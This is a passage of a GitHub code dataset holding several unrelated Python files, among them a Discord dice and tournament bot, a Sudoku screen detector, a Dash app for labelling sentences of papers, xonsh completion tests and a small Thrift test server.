discord.Embed(description=f'You rolled a {random.choice(dice_)}',\n color=colors.fun)\n rolldice.set_author(name='Roll a dice', url=botsetup.website, icon_url=links.giveaway_fun)\n rolldice.set_footer(text=wm.footer)\n await ctx.send(embed=rolldice)\n\n @commands.command(pass_context=True)\n async def coinflip(self, ctx):\n flip = random.choice([\n f'https://upload.wikimedia.org/wikipedia/de/thumb/8/80/2_euro_coin_Eu_serie_1.png/220px-2_euro_coin_Eu_serie_1.png',\n f'https://www.zwei-euro.com/wp-content/uploads/2019/02/DE-2002.gif'])\n flipcoin = discord.Embed()\n flipcoin.colour = 0x12423\n flipcoin.set_thumbnail(\n url=\"https://media1.tenor.com/images/938e1fc4fcf2e136855fd0e83b1e8a5f/tenor.gif?itemid=5017733\")\n flipcoin1 = await ctx.send(embed=flipcoin)\n coin = discord.Embed()\n coin.set_thumbnail(url=f'{flip}')\n await asyncio.sleep(2)\n await flipcoin1.delete()\n await ctx.send(embed=coin)\n\n @commands.command()\n async def tournament(self, ctx, tc1: discord.Member, tc2: discord.Member, tc3: discord.Member, tc4: discord.Member):\n try:\n user = [tc1, tc2, tc3, tc4]\n hitu1 = f'{tc1} choose a card!'\n hitu2 = f'{tc2} choose a card!'\n hitu3 = f'{tc3} choose a card!'\n hitu4 = f'{tc4} choose a card!'\n rndmc = ['https://i.pinimg.com/originals/9b/bb/70/9bbb7015af1bcd420ee07d89048cebf7.jpg',\n 'https://pics.me.me/thumb_earth-angry-german-kid-spellcastor-tuner-he-rages-about-lag-and-52634494.png',\n 'https://www.memesmonkey.com/images/memesmonkey/cb/cbc69b7a454ec9f50fa0616ca3d4d4d9.jpeg',\n 'https://i.imgur.com/gq8aDzq.jpg',\n 'https://i.redd.it/gqse7u1cudw31.png',\n 'https://i.imgur.com/yeD5fGI.gif',\n 'https://images-na.ssl-images-amazon.com/images/I/51jxIccbroL._AC_.jpg',\n 'https://images-cdn.9gag.com/photo/aDzZ1LO_460s.jpg']\n\n fight = discord.Embed(description=f'{tc1} vs. {tc2} vs. {tc3} vs. 
{tc4}')\n            fight.set_author(name='Battle', icon_url=links.battle, url=botsetup.website)\n            fight.set_thumbnail(url='https://media3.giphy.com/media/dw5SDFsmqFhYs/giphy.gif')\n            fight.set_footer(text=wm.footer)\n            fight1 = await ctx.send(embed=fight)\n\n            # twelve rounds in the original turn order; every message is kept so it can be deleted afterwards\n            order = [hitu1, hitu2, hitu3, hitu4,\n                     hitu1, hitu2, hitu3, hitu4,\n                     hitu2, hitu1, hitu2, hitu1]\n            hits = []\n            for title in order:\n                hit = discord.Embed(title=title, color=colors.fun)\n                hit.set_image(url=random.choice(rndmc))\n                hits.append(await ctx.send(embed=hit))\n                await asyncio.sleep(7)\n\n            await fight1.delete()\n            for hit_message in hits:\n                await hit_message.delete()\n            winner = discord.Embed(title=f'{random.choice(user)} WINS!!!\\n',\n                                   description=f'{tc1} VS. {tc2}\\n'\n                                               f'Explore more commands with /help',\n                                   color=colors.red)\n            winner.set_thumbnail(\n                url='https://cdna.artstation.com/p/assets/images/images/015/814/178/original/jean-baptiste-gabert-pokemonmockup.gif?1549763590')\n            winner.set_footer(text=wm.footer)\n            await ctx.send(embed=winner)\n\n        except:\n            error = discord.Embed(title=\"Can't find any user\", description='Usage: ```<@user>```')\n            await ctx.send(embed=error)\n\ndef setup(bot):\n    bot.add_cog(Games(bot))\n","repo_name":"philliphqs/hqs.bot","sub_path":"hqs.bot-rewrite/cogs/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":20280,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"16473992383","text":"from matplotlib import pyplot as plt\nfrom matplotlib import cm as cm\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport math\n\nfrom sklearn import preprocessing\nfrom sklearn.externals import joblib\n\ndef standardize_csv_data(input_file_path, output_file_path, begin_column_num, end_column_num, has_header = None, index = None, scaler_path=None):\n    no = end_column_num - begin_column_num\n    df = pd.read_csv(input_file_path, index_col=False, header = None, names = [i for i in range(no)])\n    df = df[df.columns[begin_column_num:end_column_num]].values\n    standard_df = standardize_dataset(df, scaler_path)\n    #standard_df.columns = df.columns\n    #standard_df.reset_index(df.index.values)\n    pd.DataFrame(standard_df).to_csv(output_file_path)\n\n\ndef standardize_dataset(dataset, scaler_path=None, standardization_scaler_function = preprocessing.StandardScaler()):\n    scaler = standardization_scaler_function.fit(dataset)\n\n    # store the standard scaler into scaler_path\n    if scaler_path is not None:\n        joblib.dump(scaler, scaler_path)\n    \n    scaled_data = scaler.transform(dataset)\n\n    if type(dataset) == pd.DataFrame:\n        scaled_data = pd.DataFrame(scaled_data, index=dataset.index, columns=dataset.columns)\n\n    return scaled_data\n\nif __name__ == '__main__':\n    df = pd.read_csv('../resource/sonar.all-data.csv', index_col=False,\n                     header = None, names = [i for i in range(61)])\n    standardize_csv_data('../resource/sonar.all-data.csv', '../resource/sonar.all-data_standardized.csv', 0, 60)\n\n    df = pd.read_csv('../resource/sonar.all-data.csv', index_col=False,\n                     header = None, names = [i for i in range(61)])\n    dataset = df.loc[:, 0:59]\n    dataset1 = standardize_dataset(dataset, './filename.pkl')\n    scaler = joblib.load('./filename.pkl')\n    dataset2 = pd.DataFrame(scaler.transform(dataset) , index=dataset.index, columns=dataset.columns)\n\n    print(dataset1.equals(dataset2))\n","repo_name":"yingjieduan/utility","sub_path":"data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39226184605","text":"import sys\r\nimport math\r\n\r\nfor line in sys.stdin:\r\n    a=line.strip()\r\n    freq={}\r\n    for i in a:\r\n        if i not in freq:\r\n            freq[i]=0\r\n        freq[i]+=1\r\n\r\n    ans = math.factorial(len(a))\r\n\r\n    for i in freq:\r\n        #print(i)\r\n        ans = ans // math.factorial(freq[i])\r\n\r\n    print(int(ans))\r\n","repo_name":"Matistjati/Competitive-programming-solutions","sub_path":"open/anagramcounting.py","file_name":"anagramcounting.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6026941602","text":"\nimport argparse\nfrom imutils import 
contours\nimport imutils\nimport cv2\nimport itertools\nimport numpy as np\nimport pyautogui, time\n\nclass SudokuDetection:\n\n def __init__(self):\n \n #set up reference font for the numbers. \n #For some fonts, it might be necessary to change this reference\n ref = cv2.imread(\"pictures/reference_smartgames.jpg\")\n ref = cv2.cvtColor(ref, cv2.COLOR_BGR2GRAY)\n ref = cv2.threshold(ref, 180, 255, cv2.THRESH_BINARY)[1]\n ref = cv2.bitwise_not(ref)\n \n ref_cnts = cv2.findContours(ref.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n ref_cnts = imutils.grab_contours(ref_cnts)\n ref_cnts = contours.sort_contours(ref_cnts, method='left-to-right')[0]\n \n self.digits = {}\n for i,c in enumerate(ref_cnts):\n x,y,w,h = cv2.boundingRect(c)\n roi = ref[y:y+h, x:x+w]\n roi_resized = cv2.resize(roi,(57,88))\n self.digits[i] = roi_resized\n \n def get_puzzle_from_screen(self):\n \n screen = pyautogui.screenshot()\n screen_array = np.array(screen) \n screen = screen_array[:, :, ::-1].copy()\n \n # pre-process the image by resizing it, converting it to\n # graycale, blurring it, and computing an edge map\t\t\n gray = cv2.cvtColor(screen, cv2.COLOR_BGR2GRAY)\n blurred = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(blurred, 50, 200, 255)\t\t\n \n cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n cnts = sorted(cnts, key=cv2.contourArea, reverse=True)\n displayCnt = None\n x,y,w,h = 0,0,0,0\n \n # loop over the contours\n for c in cnts:\n # approximate the contour\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n x,y,w,h = cv2.boundingRect(c)\n \n #assume the puzzle is the largest square\n if .9 * w < h < 1.1 * w:\n displayCnt = approx\n break\n\n pad_h = int(h / 9 / 30) \n pad_w = int(h / 9/ 30)\n puzzle = None \n puzzle = screen[y:y+h-pad_h, x+pad_w:x+w]\n \n return (self.process_puzzle(puzzle), x,y,w,h)\n \n \n\n def get_puzzle_from_file(self, file):\n\n image = cv2.imread(file)\n return self.process_puzzle(image)\n \n def process_puzzle(self, image):\n \n puzzle = [[0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0]]\n\n height, width = image.shape[:2]\n box_height = int(height / 9.0)\n box_width = int(width / 9.0)\n trim_height = int(box_height / 7)\n trim_width = int(box_width / 7)\n \n for i in range(9):\t\t\n for j in range(9): \n box = image[box_width*i+trim_width:box_width*(i+1)-trim_width,box_height*j+\\\n trim_height:box_height*(j+1)-trim_height].copy()\n puzzle[i][j] = self.get_digit(box)\n\n return puzzle\n\n\n def get_digit(self, image):\n\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n image = cv2.threshold(image, 180, 255, cv2.THRESH_BINARY)[1]\n image = cv2.bitwise_not(image)\n \n cnts = cv2.findContours(image.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n if len(cnts) > 0:\n cnts = contours.sort_contours(cnts, method='left-to-right')[0]\n \n d = 0\n for i,c in enumerate(cnts):\n x,y,w,h = cv2.boundingRect(c)\n \n digit = image[y:y+h, x:x+w]\n digit_resized = cv2.resize(digit,(57,88))\n \n scores = []\n \n #find the digit with the closest match\n for (digit, digitROI) in self.digits.items():\n result = cv2.matchTemplate(digit_resized, digitROI, cv2.TM_CCOEFF)\n (_,score,_,_) = cv2.minMaxLoc(result)\n scores.append(score)\n d = np.argmax(scores) + 1\n\n return d\n \n def 
print_sudoku(self, puzzle):\n        for i in range(9):\n            print(puzzle[i])","repo_name":"crwhite14/sudoku","sub_path":"sudoku_detection.py","file_name":"sudoku_detection.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"26342938086","text":"\r\n\r\n# importing streamlit\r\nimport requests\r\nimport streamlit as st\r\nfrom streamlit_lottie import st_lottie\r\n# load assets\r\n\r\n\r\ndef load_lottieurl(url):\r\n    r = requests.get(url)\r\n    if r.status_code != 200:\r\n        return None\r\n    return r.json()\r\n\r\n\r\nlottie_coding = load_lottieurl(\r\n    \"https://assets3.lottiefiles.com/packages/lf20_glp2wakj.json\")\r\n\r\n\r\n# title of the page web\r\n\r\nst.set_page_config(page_title='MY PORTFOLIO', page_icon=':tada:', layout='wide')\r\nst.title('HELLO, MY NAME IS :wave:')\r\nst.title('Safa Idam Hamed:')\r\nst.title('A front-end developer from Morocco :woman:')\r\nst.write('Hi, stranger! :smile: I am Safa, and I am passionate about digital products that help people experience everyday life, :computer: not endure it.')\r\nst.write(':point_down:')\r\nst.write('[Find my GitHub here](https://github.com/SAFAIDAM) :link:')\r\nst.write('---')\r\n\r\n# my description\r\nst.title('WHAT I DO:bulb:')\r\nst.write('##')\r\nst.write(\r\n    \"\"\" \r\n    From understanding your requirements, designing a\r\n    blueprint and delivering the final product, I do \r\n    everything that falls in between these lines. \"\"\")\r\nst.header('WEB DEVELOPMENT')\r\nst.write(\"If you are looking for a developer who'll take over the research and \")\r\nst.write(\r\n    \"development of your website, I am a well-established professional to help you with this\"\r\n)\r\nst.header('UI/UX DESIGN')\r\nst.write(\"An effective UI/UX is what captures attention and spreads a clear message.\")\r\nst.write(\"I make sure the design is innovative and neat with all of this.\")\r\n\r\nst.write('---')\r\n\r\n\r\n# defining skills\r\nst.title(\"SKILLS\")\r\nst.header('html 90%')\r\nst.header('css 90%')\r\nst.header('js 10%')\r\nst.header('python 20%')\r\nst.header('illustrator 95%')\r\nst.header('photoshop 80%')\r\n\r\nst.write('---')\r\n\r\n# contact form\r\n\r\nst.write('Contact me here :wave:')\r\nst.write('idamhamedsafa@gmail.com')\r\n","repo_name":"SAFAIDAM/PORTFOLIO-streamlit","sub_path":"streamlit/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"7636024283","text":"import dash\nfrom flask import Flask\nfrom dash import Dash, html, dcc\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State, ALL, MATCH\nimport pdftotext as pt\nfrom io import BytesIO\nimport base64\nfrom nltk.tokenize import PunktSentenceTokenizer\nimport json\nimport pandas as pd\n\n# server = Flask(__name__)\napp = Dash(\n    __name__,\n    external_stylesheets = [dbc.themes.BOOTSTRAP],\n    # server = server\n)\napp.title = \"QuOTeS GT\"\nserver = app.server\n\n###################################\n# Upload tab\n###################################\n\nfilename_table = html.Table(\n    html.Tr(\n        [\n            html.Td(dbc.Button(dcc.Upload(children = \"Upload\", id = \"upload\"))),\n            html.Td(html.Div(id = \"filename\")),\n            html.Td(dbc.Button(\"Process Paper\", id = \"process\"))\n        ]\n    )\n)\n\ntab_upload = dbc.Tab(\n    label = \"Upload\",\n    children = [\n        filename_table,\n        html.P(),\n        html.Div(id = \"paper_data\")\n    
]\n)\n\n###################################\n# Highlights tab\n###################################\n\ntab_highlights = dbc.Tab(\n label = \"Highlights\",\n children = [\n dbc.Card(\n [\n html.H3(\"Query\"),\n dbc.Textarea(id = \"query\", rows = 5),\n ],\n style = {\"position\":\"sticky\", \"top\":0}\n ),\n html.Div(\n [\n html.H3(\"Sentences\"),\n html.Div(id = \"highlights_table\", \n )\n ],\n )\n ],\n)\n\n###################################\n# Summary tab\n###################################\n\ntab_summary = dbc.Tab(\n label = \"Summary\",\n children = [\n dbc.Row(\n [\n dbc.Col(html.H3(\"Query\")),\n dbc.Col(),\n dbc.Col(\n dbc.Card(\n dbc.Button(\n \"Download .txt\", \n id = \"download_txt_button\"\n )\n ), \n width = 3\n ),\n dbc.Col(\n dbc.Card(\n dbc.Button(\n \"Download .csv\", \n id = \"download_csv_button\"\n )\n ), \n width = 3\n ),\n dbc.Col(\n dbc.Card(\n dbc.Button(\n \"Download .json\", \n id = \"download_json_button\"\n )\n ), \n width = 3\n ),\n ]\n ),\n html.P(id = \"summary_query\"),\n html.H3(\"Selected Sentences\"),\n html.Div(id = \"accepted_sentences\")\n ]\n)\n\n###################################\n# Main Container\n###################################\n\napp.layout = dbc.Container(\n [\n dcc.Store(id = \"sentences\"),\n dcc.Store(id = \"relevant\"),\n dcc.Download(id = \"download_txt\"),\n dcc.Download(id = \"download_csv\"),\n dcc.Download(id = \"download_json\"),\n html.H1(\"QuOTeS Ground Truth\"),\n dbc.Tabs([tab_upload, tab_highlights, tab_summary])\n ],\n fluid = True\n)\n\n###################################\n# Callbacks\n###################################\n\n@app.callback(\n Output(\"summary_query\", \"children\"),\n Input(\"query\", \"value\")\n)\ndef update_summary_query(query):\n return query\n\n@app.callback(\n Output(\"filename\", \"children\"),\n Input(\"upload\", \"filename\")\n)\ndef update_filename(filename):\n return f\"filename: {filename}\" \n\n@app.callback(\n Output(\"sentences\", \"data\"),\n Output(\"query\", \"value\"),\n Input(\"process\", \"n_clicks\"),\n State(\"upload\", \"contents\"),\n State(\"upload\", \"filename\")\n)\ndef upload(clicks, contents, filename):\n if contents:\n content_type, content_string = contents.split(',')\n decoded = base64.b64decode(content_string)\n file = BytesIO(decoded)\n if filename.split(\".\")[-1] == \"pdf\":\n pdf = pt.PDF(file, raw = True)\n document = \"\".join(pdf).replace(\"-\\n\", \"\").replace(\"\\n\", \" \")\n tokenizer = PunktSentenceTokenizer(document)\n sentences = tokenizer.tokenize(document)\n return json.dumps(sentences), \"\"\n else:\n decoded = json.loads(file.read())\n query = decoded[\"query\"]\n sentences = decoded[\"document\"].split(\"\\n\\n\")\n return json.dumps(sentences), query\n else:\n return None, \"\"\n\n@app.callback(\n Output(\"paper_data\", \"children\"),\n Input(\"sentences\", \"data\")\n)\ndef update_paper_data(sentences):\n if sentences:\n sentences = json.loads(sentences)\n output = [\n html.P(f\"Characters: {len(''.join(sentences)):,}\"),\n html.P(f\"Sentences: {len(sentences):,}\")\n ]\n return output\n else:\n return None\n\n@app.callback(\n Output(\"highlights_table\", \"children\"),\n Input(\"sentences\", \"data\")\n)\ndef update_highlights(sentences):\n if sentences:\n sentences = json.loads(sentences)\n header = html.Thead(\n [\n html.Th(\"Sentence\"),\n html.Th(\"Text\"),\n ]\n )\n output = [header]\n for i, s in enumerate(sentences):\n row = html.Tr(\n [\n html.Td(i), \n html.Td(s), \n ],\n id = dict(kind = \"highlight_row\", index = i)\n )\n 
output.append(row)\n return dbc.Table(output)\n else:\n return [html.Td(\"The sentences of the paper will appear here\", \n id = dict(kind = \"highlight_row\", index = 0))]\n\n@app.callback(\n Output({\"kind\":\"highlight_row\", \"index\":MATCH}, \"style\"),\n Input({\"kind\":\"highlight_row\", \"index\":MATCH}, \"n_clicks\"),\n prevent_initial_call = True\n)\ndef update_row_colors(clicks):\n ctx = dash.callback_context.triggered[0]\n prop_id = json.loads(ctx[\"prop_id\"].split(\".\")[0])\n index = prop_id[\"index\"]\n # print(ctx)\n # print(index)\n if clicks:\n return {\"background\":\"lightgreen\"} if (clicks % 2) == 1 else {\"background\":\"lightpink\"}\n\n@app.callback(\n Output(\"relevant\", \"data\"),\n Input({\"kind\":\"highlight_row\", \"index\":ALL}, \"style\"),\n Input(\"sentences\", \"data\"),\n State(\"relevant\", \"data\"),\n # prevent_initial_call = True\n)\ndef update_relevant(*args):\n # print(\"\\nupdate_relevant\")\n ctx = dash.callback_context.triggered[0]\n #print(ctx)\n prop_id = ctx[\"prop_id\"]\n ctx_value = ctx[\"value\"]\n # print(prop_id)\n # print(ctx_value)\n # print(ctx_value[:8])\n # print(ctx_value[:10])\n output = None\n if (prop_id == \"sentences.data\" and args[-2]):\n #print(\"loading sentences\")\n sentences = json.loads(args[-2])\n output = json.dumps([None for s in sentences])\n elif prop_id[:8] == '{\"index\"' and ctx_value and args[-1]:\n #print(\"updating relevant\")\n index = json.loads(prop_id.split(\".\")[0])[\"index\"]\n relevant = json.loads(args[-1])\n if ctx_value[\"background\"] == \"lightgreen\":\n relevant[index] = True\n elif ctx_value[\"background\"] == \"lightpink\":\n relevant[index] = False\n output = json.dumps(relevant)\n elif prop_id == '{\"index\":0,\"kind\":\"highlight_row\"}.style' and ctx_value is None and args[-1]:\n #print(\"initial table\")\n relevant = json.loads(args[-1])\n output = json.dumps(relevant)\n return output\n # prop_id = json.loads(ctx[\"prop_id\"].split(\".\")[0])\n # index = prop_id[\"index\"]\n # print(prop_id)\n # styles = args[:-1][0]\n # print(styles)\n # sentences = args[-1]\n # # print(sentences)\n # # print(len(sentences))\n # if sentences:\n # sentences = json.loads(sentences)\n # # print(sentences)\n # print(len(sentences))\n # output = []\n # for s in styles:\n # output.append(None)\n # return json.dumps(output)\n # else:\n # return None\n\n@app.callback(\n Output(\"accepted_sentences\", \"children\"),\n Input(\"relevant\", \"data\"),\n State(\"sentences\", \"data\")\n)\ndef update_summary_table(relevant, sentences):\n # print(\"\\nupdate_summary_table\")\n # print(relevant)\n if relevant:\n relevant = json.loads(relevant)\n sentences = json.loads(sentences)\n #print(relevant)\n #return html.Ul([html.Li(f\"{i} - {s}\") for i, (s, r) in enumerate(zip(sentences, relevant)) if r])\n return dbc.Table([html.Tr([html.Td(i), html.Td(s)]) for i, (s, r) in enumerate(zip(sentences, relevant)) if r])\n else:\n return None\n\n@app.callback(\n Output(\"download_txt\", \"data\"),\n Input(\"download_txt_button\", \"n_clicks\"),\n State(\"sentences\", \"data\"),\n State(\"relevant\", \"data\"),\n prevent_initial_call = True\n)\ndef download_txt(clicks, sentences, relevant):\n filename = \"summary.txt\"\n content = \"\"\n if sentences and relevant:\n sentences = json.loads(sentences)\n relevant = json.loads(relevant)\n content = \"\\n\\n\".join([s for s, r in zip(sentences, relevant) if r])\n return dict(filename = filename, content = content)\n\n@app.callback(\n Output(\"download_csv\", \"data\"),\n 
Input(\"download_csv_button\", \"n_clicks\"),\n State(\"sentences\", \"data\"),\n State(\"relevant\", \"data\"),\n prevent_initial_call = True\n)\ndef download_csv(clicks, sentences, relevant):\n filename = \"summary.csv\"\n content = \"\"\n if sentences and relevant:\n sentences = json.loads(sentences)\n relevant = json.loads(relevant)\n content = pd.DataFrame(\n [(i, s, r) for i, (s, r) in enumerate(zip(sentences, relevant)) if r is not None],\n columns = [\"sentence\", \"text\", \"relevance\"]\n ).to_csv()\n return dict(filename = filename, content = content)\n\n@app.callback(\n Output(\"download_json\", \"data\"),\n Input(\"download_json_button\", \"n_clicks\"),\n State(\"sentences\", \"data\"),\n State(\"relevant\", \"data\"),\n State(\"query\", \"value\"),\n prevent_initial_call = True\n)\ndef download_json(clicks, sentences, relevant, query):\n filename = \"ground_truth_results.json\"\n content = \"\"\n if sentences and relevant:\n sentences = json.loads(sentences)\n relevant = json.loads(relevant)\n labels = pd.DataFrame(\n [(i, s, r) for i, (s, r) in enumerate(zip(sentences, relevant)) if r is not None],\n columns = [\"sentence\", \"text\", \"relevance\"]\n )\n content = dict(\n sentences = sentences,\n query = query,\n labels = labels.to_json()\n )\n return dict(filename = filename, content = json.dumps(content))\n\n\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"jarobyte91/quotes_gt","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8624281993","text":"import os\nimport subprocess\n\nimport pytest # noqa F401\n\nfrom xonsh.completers.man import complete_from_man\nfrom xonsh.pytest.tools import skip_if_not_on_darwin, skip_if_on_windows\n\n\n@skip_if_on_windows\n@pytest.mark.parametrize(\n \"cmd,exp\",\n [\n [\n \"yes\",\n {\"--version\", \"--help\"},\n ],\n [\n \"man\",\n {\n \"--all\",\n \"--apropos\",\n \"--ascii\",\n \"--catman\",\n \"--config-file\",\n \"--debug\",\n \"--default\",\n \"--ditroff\",\n \"--encoding\",\n \"--extension\",\n \"--global-apropos\",\n \"--gxditview\",\n \"--help\",\n \"--html\",\n \"--ignore-case\",\n \"--local-file\",\n \"--locale\",\n \"--location\",\n \"--location-cat\",\n \"--manpath\",\n \"--match-case\",\n \"--names-only\",\n \"--nh\",\n \"--nj\",\n \"--no-subpages\",\n \"--pager\",\n \"--preprocessor\",\n \"--prompt\",\n \"--recode\",\n \"--regex\",\n \"--sections\",\n \"--systems\",\n \"--troff\",\n \"--troff-device\",\n \"--update\",\n \"--usage\",\n \"--version\",\n \"--warnings\",\n \"--whatis\",\n \"--wildcard\",\n },\n ],\n ],\n)\ndef test_man_completion(xession, check_completer, cmd, exp):\n xession.env[\"MANPATH\"] = os.path.dirname(os.path.abspath(__file__))\n completions = check_completer(cmd, complete_fn=complete_from_man, prefix=\"-\")\n assert completions == exp\n\n\n@skip_if_not_on_darwin\n@pytest.mark.parametrize(\n \"cmd,exp\",\n [\n [\n \"ar\",\n {\n \"-L\",\n \"-S\",\n \"-T\",\n \"-a\",\n \"-b\",\n \"-c\",\n \"-d\",\n \"-i\",\n \"-m\",\n \"-o\",\n \"-p\",\n \"-q\",\n \"-r\",\n \"-s\",\n \"-t\",\n \"-u\",\n \"-x\",\n },\n ],\n ],\n)\ndef test_bsd_man_page_completions(xession, check_completer, cmd, exp):\n proc = subprocess.run([cmd, \"--version\"], stderr=subprocess.PIPE)\n if (cmd == \"ar\" and proc.returncode != 1) or (\n cmd == \"man\" and proc.stderr.strip() not in {b\"man, version 1.6g\"}\n ):\n pytest.skip(\"A different man page version is installed\")\n # BSD & 
Linux have different man page version\n completions = check_completer(cmd, complete_fn=complete_from_man, prefix=\"-\")\n assert completions == exp\n","repo_name":"xonsh/xonsh","sub_path":"tests/test_man.py","file_name":"test_man.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":7388,"dataset":"github-code","pt":"78"} +{"seq_id":"19529065865","text":"#!/usr/bin/env python\n\"\"\"\nRun basic end-to-end test\n\"\"\"\n__author__ = 'Dan Gunter '\n\n# Stdlib\nimport argparse\nimport logging\nimport subprocess\nimport sys\nimport time\n# Third-party\n#from thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.protocol import TBinaryProtocol\nfrom thrift.server import TServer\nfrom thrift.server.THttpServer import THttpServer\n# Local\nfrom kbtest.basic import thrift_service\n\n\n# Logging boilerplate\n_log = logging.getLogger('run_basic')\n_h = logging.StreamHandler()\n_h.setFormatter(logging.Formatter('%(asctime)s %(name)s %(levelname)s '\n '%(message)s'))\n_log.addHandler(_h)\n_log.setLevel(logging.INFO)\n\n#: Server listen port\nPORT = 9100\n\n\ndef run_cors_proxy(path, port):\n _log.info('Run CORS proxy. program={} port={}'.format(path, port))\n cmd = 'CORSPROXY_PORT={port} {bin}'.format(port=port, bin=path)\n proxy = subprocess.Popen(cmd, shell=True)\n _log.info('CORS proxy started. pid={}'.format(proxy.pid))\n return proxy\n\nclass BasicTestHandler(thrift_service.Iface):\n def get_a_map(self, mapkeys):\n _log.debug('get_a_map/start. keys={}'.format(mapkeys))\n result = {}\n i = 1\n for key in mapkeys:\n result[key] = 1.0 * i\n i += 1\n _log.debug('get_a_map/end. result={}'.format(result))\n return result\n\n def add_integers(self, x, y):\n _log.debug('add_integers/start. x={} y={}'.format(x, y))\n result = x + y\n _log.debug('add_integers/end. result={}'.format(result))\n return result\n\ndef main(cmdline):\n p = argparse.ArgumentParser()\n p.add_argument('-c', '--proxy', dest='proxy_bin', default='',\n help='Run CORS proxy binary at PATH', metavar='PATH')\n p.add_argument('-p', '--port', dest='proxy_port', type=int, default=8000,\n help='Run CORS proxy on PORT (default=%(default)d)',\n metavar='PORT')\n p.add_argument('-v', '--verbose', action='count', dest='vb', default=0,\n help='Increase verbosity of output to stderr')\n\n args = p.parse_args(cmdline)\n\n loglevel = [logging.WARN, logging.INFO, logging.DEBUG][min(args.vb, 2)]\n _log.setLevel(loglevel)\n\n use_proxy, proxy = bool(args.proxy_bin), None\n if use_proxy:\n proxy = run_cors_proxy(args.proxy_bin, args.proxy_port)\n\n handler = BasicTestHandler()\n processor = thrift_service.Processor(handler)\n #transport = TSocket.TServerSocket(port=PORT)\n tfactory = TTransport.TBufferedTransportFactory()\n pfactory = TBinaryProtocol.TBinaryProtocolFactory()\n server = THttpServer(processor, ('localhost', PORT), pfactory)\n\n _log.info('Start server. port={:d}'.format(PORT))\n try:\n server.serve()\n except KeyboardInterrupt:\n _log.info('Interrupted')\n _log.info('Server stopped')\n\n # Stop the proxy, if it was running\n if proxy is not None:\n _log.info('Stopping CORS proxy. pid={}'.format(proxy.pid))\n for i in range(3):\n proxy.terminate()\n time.sleep(1)\n proxy.poll()\n if proxy.returncode is not None:\n break\n if proxy.returncode is None:\n proxy.kill()\n time.sleep(2)\n proxy.poll()\n if proxy.returncode is None:\n _log.error('Failed to stop CORS proxy. 
pid={}'.format(proxy.pid))\n else:\n _log.debug('CORS proxy stopped.')\n\n return 0\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"kbase/kbase-data-thrift-js","sub_path":"src/python/scripts/run_basic.py","file_name":"run_basic.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"3979087708","text":"string_phrase = 'with three words'\nabcgo = string_phrase + ' '\nx = 0\nabclist = list()\nfor letter in abcgo:\n if letter == ' ' and len(abclist)<1: \n word = (abcgo[:x])\n abclist[len(abclist):] = [word]\n buffer = (abcgo[:x])\n int_buffer = len(buffer)\n elif letter == ' ' and len(abclist) >= 1:\n word = (abcgo[int_buffer+1:x])\n abclist[len(abclist):] = [word]\n buffer = (abcgo[:x])\n int_buffer = len(buffer)\n x+=1\nprint(abclist)","repo_name":"SuprLazr/Learning","sub_path":"Python/Function Processes/append_practice.py","file_name":"append_practice.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30013499438","text":"import torch as t\nimport torch.nn as nn\nfrom torch.nn import functional as F\n\nclass FasterRCNN(nn.Module):\n \"\"\"This is the base class for Faster RCNN.\n It is composed of following three parts.\n 1. **Feature Extraction**: This stage is to extract and down sampling features from the given image,\\\n using conv layers and pooling layers.\n 2. **Region Proposal Network**: Given the features extracted, this stage decides Regions of Interest\\\n (RoIs) of the objects.\n 3. **Localization and Classification Heads**: This stage uses the extracted features and RoIs to \\\n classify the categories of the objects and promote localization performances.\n \"\"\"\n def __init__(self,extractor,rpn,head):\n super(FasterRCNN,self).__init__()\n self.extractor=extractor\n self.rpn=rpn;\n self.head=head\n def forward(self,x,scale=1.):\n xFeatured=self.extractor(x)\n rpn_locs,rpn_scores,rois,roi_indices,anchor=self.rpn(xFeatured,x.size()[2:],scale)\n roi_cls_locs,roi_scores=self.head(xFeatured,rois,roi_indices)\n return 